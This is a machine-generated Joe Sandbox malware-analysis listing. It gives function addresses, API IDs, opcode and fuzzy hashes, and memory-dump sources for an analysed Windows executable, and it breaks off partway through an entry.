                                                                                        • Instruction ID: 1993edc2bd49e95720ddabf265f9800cf8b7e64e5a659217e07838687ab2f279
                                                                                        • Opcode Fuzzy Hash: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                                                                                        • Instruction Fuzzy Hash: 80E08C12F2052582FF24EB6BD8826A81720AFE8B84B481030EE1C873A5DE28D491CA40
                                                                                        Function 00007FF6FE192490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileType
                                                                                        • String ID:
                                                                                        • API String ID: 3081899298-0
                                                                                        • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                        • Instruction ID: 1cc7a2315333f1ab38db0f2ff978384dbc3ad52d1c19524715aa93af6a47c5ce
                                                                                        • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                        • Instruction Fuzzy Hash: FFD01212E09451C2EF10D73BA89107C2750AFE2735FA40730E63EC26E1DF1DA496E311
                                                                                        Function 00007FF6FE197FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 1611563598-0
                                                                                        • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                        • Instruction ID: 8e74601da509eabb9dfb46bf47ef97c58fccfe75a68545ddde8bc83d2b0c3dbe
                                                                                        • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                        • Instruction Fuzzy Hash: 60C08C21F06502C1DF089B2BC8C905C13A4BBA0B04F604034E12CC11A0EE2CD4FE9345
                                                                                        Function 00007FF6FE1BFA04 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 4292702814-0
                                                                                        • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                        • Instruction ID: dfa2150f0eab366929a52635024403f98e943e3bf713ee51644b64b616176b9c
                                                                                        • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                        • Instruction Fuzzy Hash: D8F04454F0A20749FF58EA7799513F45A80AFF9B80F0C5430F92ECA3C2FE2CA6818210
                                                                                        Function 00007FF6FE1920D0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                        • Instruction ID: 4ddace2e5385fbd1188cf1cc798af9738d2dd2a97bd5aed425c64e97ab7cfc56
                                                                                        • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                        • Instruction Fuzzy Hash: F2F08C62E0868285FB24CB22E04127D2A61EBA4B78F484335F73D811D8EE28D8A5C300
                                                                                        Function 00007FF6FE1BD94C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 4292702814-0
                                                                                        • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                        • Instruction ID: e14eed25e63ed3fd3ff63db42d2ec70fb54553b470298dc793d9353d2e44daae
                                                                                        • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                        • Instruction Fuzzy Hash: 7DF0DF51F0924B45FF6CEAA359516B51A90AFE87A0F485A30F97EC67C2FE2CA4808211

                                                                                        Non-executed Functions

                                                                                        Function 00007FF6FE18C2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                        • API String ID: 2659423929-3508440684
                                                                                        • Opcode ID: 728ca5c511583d96efffbafc78ffbc9d028dc1943734bb9c87de0126960d7cef
                                                                                        • Instruction ID: 9c8f303274d7f5564431f23d28781a96cc1276625833bb696a3f8f047e3e0fe8
                                                                                        • Opcode Fuzzy Hash: 728ca5c511583d96efffbafc78ffbc9d028dc1943734bb9c87de0126960d7cef
                                                                                        • Instruction Fuzzy Hash: 18629162F0864285FB00DB76D4442AD2B61ABE57A4F504332FA7D97AE5EF3CE685C301
                                                                                        Function 00007FF6FE19F180 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                        • String ID: %ls$%s: %s
                                                                                        • API String ID: 2539828978-2259941744
                                                                                        • Opcode ID: b94a3b4d4ee99872e46ecaca9b73eb32f2d8f4e98bb6d8a8cc0fe3901ec98d03
                                                                                        • Instruction ID: dbe53ad7f3d9dad417b5922559726cae02c5926f750c0d8bdc43a0601712a1c4
                                                                                        • Opcode Fuzzy Hash: b94a3b4d4ee99872e46ecaca9b73eb32f2d8f4e98bb6d8a8cc0fe3901ec98d03
                                                                                        • Instruction Fuzzy Hash: 7CB25362E5968281EB14DB26D4542BE6712BFE9790F104336F6BD877EAFE2CE544C300
                                                                                        Function 00007FF6FE1C2550 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                        • API String ID: 1759834784-2761157908
                                                                                        • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                        • Instruction ID: 91dcdd20e514a0a4736bf5b824c73730430177f71781f43a52df62bb39a82979
                                                                                        • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                        • Instruction Fuzzy Hash: 8CB2E872F085928BE725CE6A9440AFD2B91FBE4788F505135EA2AD7BC4EF38E544C740
                                                                                        Function 00007FF6FE191A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                        • String ID: rtmp
                                                                                        • API String ID: 3587137053-870060881
                                                                                        • Opcode ID: 5e507f6e96efdb11ced4af7afdc0703881383effb4b77f0e0126ffc0c5db1fa5
                                                                                        • Instruction ID: ea579755d51b7d0e0367e320aee085b30f892930591340c25655facdc3377413
                                                                                        • Opcode Fuzzy Hash: 5e507f6e96efdb11ced4af7afdc0703881383effb4b77f0e0126ffc0c5db1fa5
                                                                                        • Instruction Fuzzy Hash: 98F17F22F08A4285FB10DB66D4801ED6B61EBE57D4F501132FA6D87AE9EF3CE588C740
                                                                                        Function 00007FF6FE195B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1693479884-0
                                                                                        • Opcode ID: f4aab3d6a38d3a7c87b22c38f8e02ebac67e4094d45f76237e24e5c31d843a01
                                                                                        • Instruction ID: d60728cd4378b041d2c9a0c2faa0b13102358e0e49a7b8c6c74ee12de384b8bc
                                                                                        • Opcode Fuzzy Hash: f4aab3d6a38d3a7c87b22c38f8e02ebac67e4094d45f76237e24e5c31d843a01
                                                                                        • Instruction Fuzzy Hash: 2BA1C462F15B5184FF10CB7A98441BD6761ABE9BE4B544231EE3EA7BD9EE3CE041C210
                                                                                        Function 00007FF6FE1B3170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3140674995-0
                                                                                        • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                        • Instruction ID: 8a26d1c085423c088708607d26c49a4db96ebb439572d2060f7d30810241128b
                                                                                        • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                        • Instruction Fuzzy Hash: 50318D72A08B818AEB60CF65E8903ED7764FB94744F44503AEA5D83B88EF7CD149C700
                                                                                        Function 00007FF6FE1B76D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1239891234-0
                                                                                        • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                        • Instruction ID: 8732b13a0cc415737a5ff1caa385a671654156454c650ce71812a0dbf8f78c01
                                                                                        • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                        • Instruction Fuzzy Hash: 26314F32A08B8185DB60CF66E8402EA77A4FBD8754F541136FA9D83B99EF38D555C700
                                                                                        Function 00007FF6FE181AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: de64f728d12beaa22573aa5c8c3373be7786903fe8bc75938e9b5cbc412359fd
                                                                                        • Instruction ID: c41d794f06c531fc8b17106da89386c6432ced59b4a456ae420d3a86ba181a9c
                                                                                        • Opcode Fuzzy Hash: de64f728d12beaa22573aa5c8c3373be7786903fe8bc75938e9b5cbc412359fd
                                                                                        • Instruction Fuzzy Hash: 05B19063F18A8645EB10DB66D8442ED2761FBE5794F405232FA6D87BD9EF2CD644C300
                                                                                        Function 00007FF6FE1BFA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FE1BFAC4
                                                                                          • Part of subcall function 00007FF6FE1B7934: GetCurrentProcess.KERNEL32(00007FF6FE1C0CCD), ref: 00007FF6FE1B7961
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                        • String ID: *?$.
                                                                                        • API String ID: 2518042432-3972193922
                                                                                        • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                        • Instruction ID: 6827ca9ebd94436ec87e969a7626813ba836636d8ac0dc1fcea2b64c5b17856c
                                                                                        • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                        • Instruction Fuzzy Hash: B851F466F15A9541EB14DFA799104B86BA4FBA8BD8B444531EE2D97BC5EF3CD042C300
                                                                                        Function 00007FF6FE1C2080 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 1502251526-0
                                                                                        • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                        • Instruction ID: 68d2a2a6a16eeeafda15eef17f2bb9258001bd7b0a3b907b9e1539a7f3d86a0c
                                                                                        • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                        • Instruction Fuzzy Hash: CAD18572B1868687D764CF1AE1846AABBA1F7D8744F148134DB5ED7B84EE3CE941CB00
                                                                                        Function 00007FF6FE18B6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
